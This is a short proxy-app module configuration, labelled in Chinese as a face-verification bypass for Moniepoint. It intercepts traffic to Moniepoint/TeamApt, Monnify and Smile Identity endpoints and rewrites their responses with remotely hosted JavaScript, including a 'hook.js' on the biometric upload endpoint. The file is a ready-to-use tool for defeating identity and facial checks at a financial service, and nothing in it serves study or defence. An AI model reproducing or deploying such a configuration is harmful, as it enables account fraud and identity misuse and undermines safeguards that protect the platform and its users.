#!name=mp 过人脸
#!desc=过人脸认证
#!category=Moniepoint

[MITM]
hostname = %APPEND% users.mab.console.teamapt.com, api.smileidentity.com, frontoffice.mp.monnify.com

[Script]

# web_reference
webreference=type=http-response,pattern=^https:\/\/frontoffice\.mp\.monnify\.com\/api\/.*$, script-path=https://raw.githubusercontent.com/iamhysterng/moniepoint/main/Javascript/reference.js, requires-body=1

# web_res
webres=type=http-response,pattern=^https:\/\/users\.mab\.console\.teamapt\.com\/api\/v1\/smile\/submit-job$, script-path=https://raw.githubusercontent.com/iamhysterng/moniepoint/main/Javascript/web_reference_res.js, requires-body=1

# reference
reference=type=http-response,pattern=^https:\/\/users\.mab\.console\.teamapt\.com\/api\/.*$, script-path=https://raw.githubusercontent.com/iamhysterng/moniepoint/main/Javascript/reference.js, requires-body=1, timeout=15

# hook
hook=type=http-response,pattern=^https:\/\/api\.smileidentity\.com\/v1\/upload$, script-path=https://raw.githubusercontent.com/iamhysterng/moniepoint/main/Javascript/hook.js, requires-body=1

